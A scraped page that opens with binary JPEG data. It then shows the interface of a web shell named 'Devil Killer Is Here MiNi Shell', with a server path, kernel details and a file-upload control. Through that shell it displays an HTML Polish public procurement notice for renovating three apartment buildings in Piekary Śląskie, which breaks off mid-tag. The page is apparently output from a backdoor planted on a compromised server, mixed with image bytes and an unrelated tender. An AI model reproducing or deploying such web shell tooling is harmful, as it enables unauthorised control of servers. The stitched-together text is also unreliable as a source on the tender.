JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250930/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250930/0044903801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont i docieplenie budynków mieszkalnych wielorodzinnych przy ul. Kalwaryjskiej 53, ul. Przyjaźni 87 i ul. Wyszyńskiego 8a w Piekarach Śląskich - III części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Mieszkaniowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271049051</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">gen. Jerzego Ziętka 60</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piekary Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-940</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zgm@zgm.piekary.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgm.piekary.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność w zakresie zarządu i administracji nieruchomościami zabudowanymi i niezabudowanymi stanowiącymi własność lub współwłasność Gminy Piekary Śląskie </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont i docieplenie budynków mieszkalnych wielorodzinnych przy ul. Kalwaryjskiej 53, ul. Przyjaźni 87 i ul. Wyszyńskiego 8a w Piekarach Śląskich - III części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cf59cd45-f2b5-4102-a6a6-c6a89cfbf9ce</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00449038</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00056844/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Remont i docieplenie budynków mieszkalnych wielorodzinnych przy ul. Jana Długosza 84, ul. Kalwaryjskiej 53, ul. Przyjaźni 87, ul. Wyszyńskiego 8a w Piekarach Śląskich.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;PROGRAM TERMO&#34; PREMIA MZG Z GRANTEM MZG </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.zgm.piekary.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zgm-piekary.logintrade.net//</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający złożyć<br/>ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest zapoznać się z instrukcjami użytkowników Platformy<br/>przetargowej - dostępnymi pod adresem:<br/>https:/zgm-piekary.logintrade.net/rejestracja/ustawowe.html oraz zaakceptować regulamin korzystania z Platformy przetargowej<br/>dostępny pod adresem:<br/>https://zgm-piekary.logintrade.net/rejestracja/regulamin.html<br/>2. Złożenie oferty poprzez Platformę przetargową oznacza akceptację regulaminu,<br/>o którym mowa w ust. 1 niniejszego rozdziału SWZ.<br/>3. Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są na stronie internetowej Platformy<br/>przetargowej - pod adresem:<br/>https://zgm-piekary.logintrade.net/rejestracja/instrukcje.html<br/>4. Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. Logintrade SA ul. Legnicka 57D,<br/>lokal B/J, 54-203 Wrocław, nr tel. 71 787 35 34, e-mail: helpdesk@logintrade.net od poniedziałku do piątku (dni robocze) w godz.<br/>800 - 1600.<br/>5. Sposoby złożenia oferty za pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty (w zależności od wyboru<br/>opcji z logowaniem lub bez logowania), zo-stały opisane w Instrukcjach użytkowników Platformy przetargowej, dostępne pod adresem:<br/>https://zgm-piekary.logintrade.net/rejestracja/instrukcje.html.<br/>6. Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, w tym oświadczenie, o którym<br/>mowa w art. 117 ust. 4 ustawy, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy,<br/>zwane dalej „zobowiązaniem podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne ((Dz. U. z 2024 r. poz. 1557 z późn. zm.), z<br/>zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>7. Pozostałe postanowienia zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGM/NZ-263-134/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I pod nazwą: ,,Remont i docieplenie budynku mieszkalnego wielorodzinnego przy ul. Kalwaryjskiej 53 w Piekarach<br/>Śląskich.”<br/>2.1.1. Zakres robót obejmować będzie m.in.:<br/>- docieplenie ścian zewnętrznych ponad poziomem terenu w systemie ETICS (BSO) z zastosowaniem wełny mineralnej,<br/>docieplenie ścian zewnętrznych piwnic, wykonanie izolacji przeciwwilgociowej ścian piwnic, remont stropu piwnicy,<br/>docieplenie stropu nad piwnicą, ocieplenie stropu nad ostatnią kondygnacją, remont dachu, remont komina oficyny,<br/>dobudowa kominów wentylacyjnych, wymiana wywiewek kanalizacyjnych, wymiana okien części wspólnych, wymiana drzwi<br/>zewnętrznych, montaż daszku nad wejściem, wymiana parapetów i obróbek blacharskich, wymiana rynien i rur spustowych,<br/>montaż instalacji domofonowej, remont klatki schodowej wraz z wymianą instalacji elektrycznej, wykonanie oświetlenia w<br/>piwnicy i na strychu, białkowanie ścian piwnic, wymiana drzwi do piwnic i na strych, wykonanie opaski i odtworzenie<br/>chodnika wokół budynku, wykonanie nowej instalacji zewnętrznego monitoringu CCTV, dostawa i montaż systemowych<br/>masztów antenowych wraz z okablowaniem, wykonanie nowego oświetlenia przed wejściem do klatki schodowej z nr<br/>policyjnym, wymiana źródeł ciepła w mieszkaniach w których w stanie istniejącym jest ogrzewanie węglowe - montaż<br/>ogrzewania elektrycznego (piece akumulacyjne);<br/>2.1.2 W celach informacyjnych oraz dla potrzeb określenia zgodności z wymaganiami związanymi z uzyskaniem premii<br/>MZG z grantem MZG w ramach PROGRAMU TERMO, Zamawiający wymaga opracowania przez Wykonawcę na dzień<br/>zawarcia umowy o zamówienie publiczne harmonogramu rzeczowo - finansowego określającego terminy wykonania<br/>poszczególnych etapów prac z uwzględnieniem wymaganych przez Zamawiającego poniżej dokumentów:<br/>1) Wykonawca zobowiązany jest do sporządzenia audytu przedrozbiórkowego, mającego na celu analizę jakościową i<br/>ilościową strumieni odpadów oraz określającego możliwości ich zagospodarowania zgodnie z hierarchią postępowania z<br/>odpadami i Protokołem UE, dotyczącym gospodarowania odpadami z budowy i rozbiórki.<br/>2) Wykonawca zobowiązany jest do sporządzenia planu segregacji odpadów oraz wykazu odpadów, które powstaną w<br/>związku z przygotowaniem terenu robót, umożliwiający ustanowienie wewnętrznego systemu zarządzania odpadami<br/>(demontaż, sortowanie, zbieranie) zapewniającego ich selektywny odbiór z terenu robót zgodnie z hierarchią postępowania<br/>z odpadami i Protokołem UE, dotyczącym gospodarowania odpadami z budowy i rozbiórki.<br/>3) Wykonawca zobowiązany jest do sporządzenia wykazu działań skutecznie zapobiegających emisji hałasu, kurzu i<br/>zanieczyszczeń, występujących wskutek realizacji robót budowlanych. Działania powinny wpływać na efektywne obniżenie<br/>natężenia czynników negatywnych bądź prowadzić do ich całkowitego wyeliminowania, dzięki wykorzystaniu najlepszych<br/>technik.<br/>4) Wykonawca zobowiązany jest do przedkładania w trakcie prowadzenia robót Zamawiającemu deklaracji właściwości<br/>użytkowych lub krajowych deklaracji właściwości użytkowych lub innych dokumentów potwierdzających posiadanie<br/>wymaganych właściwości przez wyroby budowlane. Deklaracje wy-dawane są w oparciu o przepisy ustawy z dnia 16<br/>kwietnia 2004 r. o wyrobach budowlanych (t. j. Dz. U. z 2021 r. poz. 1213). W przypadku gdy deklaracje nie będą zawierały<br/>informacji o właściwościach wymaganych w ramach reguły DNSH Wykonawca zobowiązany jest przedłożyć inne<br/>dokumenty towarzyszące wyrobowi: karta charakterystyki, instrukcja, opis producenta itp.<br/>5) Wykonawca zobowiązany jest do przedłożenia Zamawiającemu dokumentów potwierdzających gospodarowanie<br/>odpadów z budowy i rozbiórki powstałych w trakcie prowadzenia robót zgodnie z obowiązującymi przepisami prawa<br/>uwzględniając najlepsze dostępne techniki.<br/>6) Wykonawca zobowiązany jest do przedłożenia Zamawiającemu oświadczenia kierownika robót budowlanych o realizacji<br/>przedsięwzięcia remontowego zgodnie z projektem budowlanym na druku wymaganym przez BGK na dzień rozpoczęcia<br/>czynności odbiorowych.<br/>Zamawiający zobowiązany jest do gromadzenia wyżej wymienionych dokumentów celem poświadczenia, że<br/>przedsięwzięcie nie wyrządza poważnych szkód dla celów środowiskowych i stanowi ono potwierdzenie zgodności<br/>inwestycji z wymaganiami reguły DNSH.<br/>2.1.3. Zamawiający nie wymaga dokumentacji wykazującej zgodności z procedurami związanymi z pracami przy wyrobach<br/>zawierających azbest oraz uprawnień związanych z usuwaniem azbestu. Budynek nie zawiera wyrobów zawierających<br/>azbest.<br/>2.1.4. Świadectwo charakterystyki energetycznej wskazujące jakie jest zapotrzebowanie budynku na energię po<br/>przeprowadzeniu inwestycji Zamawiający opracuje we własnym zakresie.<br/>Szczegółowy opis przedmiotu zamówienia zawiera:<br/>- załącznik nr 4 do SWZ, tj.:<br/>Część I - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/>Część II - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/>Część III - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/>- załącznik nr 5 do SWZ tj. Ocena przedsięwzięcia remontowego dla celów środowiskowych – Część I, II, III.<br/>- załącznik nr 7 do SWZ tj. Analiza dotycząca wpisywania się w gospodarkę o obiegu zamkniętym – Część I, II, III. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45315600-4 - Instalacje niskiego napięcia</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II pod nazwą: ,,Remont i docieplenie budynku mieszkalnego wielorodzinnego przy ul. Przyjaźni 87 w Piekarach<br/>Śląskich.”<br/>2.2.1. Zakres robót obejmować będzie m.in.:<br/>- docieplenie ścian zewnętrznych ponad poziomem terenu w systemie ETICS (BSO) z zastosowaniem wełny mineralnej, docieplenie ścian zewnętrznych piwnic, wykonanie izolacji przeciwwilgociowej ścian piwnic, do-cieplenie i remont stropu nad<br/>piwnicą, remont dachu wraz z jego ociepleniem, dobudowa kominów wentylacyjnych, wymiana wywiewek kanalizacyjnych,<br/>wymiana starych okien mieszkań i części wspólnych, wymiana drzwi zewnętrznych, montaż daszku nad wejściem oraz<br/>remont daszku nad wejściem do piwnicy, montaż instalacji domofonowej, remont klatek schodowych, białkowanie ścian<br/>piwnic, wymiana drzwi wewnętrznych w piwnicach, remont schodów wejściowych, wymiana rynien, rur spustowych, parapetów<br/>i obróbek blacharskich, wykonanie oświetlenia w piwnicy, wymiana wyłazu dachowego wewnętrznego, dostawa<br/>systemowej drabiny lub scho-dów drabiniastych do nowego wyłazu, dostawa i montaż systemowych masztów antenowych<br/>wraz z okablowaniem, wykonanie chodnika oraz opaski wokół budynku, wykonanie nowej instalacji zewnętrznego<br/>monitoringu CCTV, przełożenie opraw zewnętrznych – nr policyjny i oświetlenie przed wejściami do klatki schodowej,<br/>wymiana źródeł ciepła w dwóch mieszkaniach na ogrzewanie elektryczne (piece akumulacyjne);<br/>2.2.2. W celach informacyjnych oraz dla potrzeb określenia zgodności z wymaganiami związanymi z uzyskaniem premii<br/>MZG z grantem MZG w ramach PROGRAMU TERMO, Zamawiający wymaga opracowania przez Wykonawcę na dzień<br/>zawarcia umowy o zamówienie publiczne harmonogramu rzeczowo - finansowego określającego terminy wykonania<br/>poszczególnych etapów prac z uwzględnieniem wymaganych przez Zamawiającego poniżej dokumentów:<br/>1) Wykonawca zobowiązany jest do sporządzenia audytu przedrozbiórkowego, mającego na celu analizę jakościową i<br/>ilościową strumieni odpadów oraz określające-go możliwości ich zagospodarowania zgodnie z hierarchią postępowania z<br/>odpadami i Protokołem UE, dotyczącym gospodarowania odpadami z budowy i rozbiórki.<br/>2) Wykonawca zobowiązany jest do sporządzenia planu segregacji odpadów oraz wykazu odpadów, które powstaną w<br/>związku z przygotowaniem ternu robót, umożliwiający ustanowienie wewnętrznego systemu zarządzania odpadami (demontaż,<br/>sortowanie, zbieranie) zapewniającego ich selektywny odbiór z terenu robót zgodnie z hierarchią postępowania z<br/>odpadami i Protokołem UE, dotyczącym gospodarowania odpadami z budowy i rozbiórki.<br/>3) Wykonawca zobowiązany jest do sporządzenia wykazu działań skutecznie zapobiegających emisji hałasu, kurzu i<br/>zanieczyszczeń, występujących wskutek realizacji robót budowlanych. Działania powinny wpływać na efektywne obniżenie<br/>natężenia czynników negatywnych bądź prowadzić do ich całkowitego wyeliminowania, dzięki wykorzystaniu najlepszych<br/>technik.<br/>4) Wykonawca zobowiązany jest do przedkładania w trakcie prowadzenia robót Za-mawiającemu deklaracji właściwości<br/>użytkowych lub krajowych deklaracji właściwości użytkowych lub innych dokumentów potwierdzających posiadanie<br/>wymaganych właściwości przez wyroby budowlane. Deklaracje wydawane są w oparciu o przepisy ustawy z dnia 16<br/>kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2021 r. poz. 1213). W przypadku gdy deklaracje nie będą zawierały<br/>informacji o właściwościach wymaganych w ramach reguły DNSH Wykonawca zobowiązany jest przedłożyć inne<br/>dokumenty towarzyszące wyrobowi: karta charaktery-styki, instrukcja, opis producenta itp.<br/>5) Wykonawca zobowiązany jest do przedłożenia Zamawiającemu dokumentów potwierdzających gospodarowanie<br/>odpadów z budowy i rozbiórki powstałych w trakcie prowadzenia robót zgodnie z obowiązującymi przepisami prawa<br/>uwzględniając najlepsze dostępne techniki.<br/>6) Wykonawca zobowiązany jest do przedłożenia Zamawiającemu oświadczenia kierownika robót budowlanych o realizacji<br/>przedsięwzięcia remontowego zgodnie z projektem budowlanym na druku wymaganym przez BGK na dzień rozpoczęcia<br/>czynności odbiorowych.<br/>Zamawiający zobowiązany jest do gromadzenia wyżej wymienionych dokumentów celem poświadczenia, że<br/>przedsięwzięcie nie wyrządza poważnych szkód dla celów środowiskowych i stanowi ono potwierdzenie zgodności<br/>inwestycji z wymaganiami reguły DNSH.<br/>2.2.3. Zamawiający nie wymaga dokumentacji wykazującej zgodności z procedurami związanymi z pracami przy wyrobach<br/>zawierających azbest oraz uprawnień związanych z usuwaniem azbestu. Budynek nie zawiera wyrobów zawierających<br/>azbest.<br/>2.2.4. Świadectwo charakterystyki energetycznej wskazujące jakie jest zapotrzebowanie budynku na energię po<br/>przeprowadzeniu inwestycji Zamawiający opracuje we własnym zakresie.<br/>Szczegółowy opis przedmiotu zamówienia zawiera:<br/> załącznik nr 4 do SWZ, tj.:<br/>Część I - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/>Część II - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/>Część III - Dokumentacja projektowa (Projekt budowlany, Przedmiary robót i STWiORB).<br/> załącznik nr 5 do SWZ tj. Ocena przedsięwzięcia remontowego dla celów środowiskowych – Część I, II, III.<br/> załącznik nr 7 do SWZ tj. Analiza dotycząca wpisywania się w gospodarkę o obiegu zamkniętym – Część I, II, III. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45421131-1 - Instalowanie drzwi</p> <p class="mb-0">45421132-8 - Instalowanie okien</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p 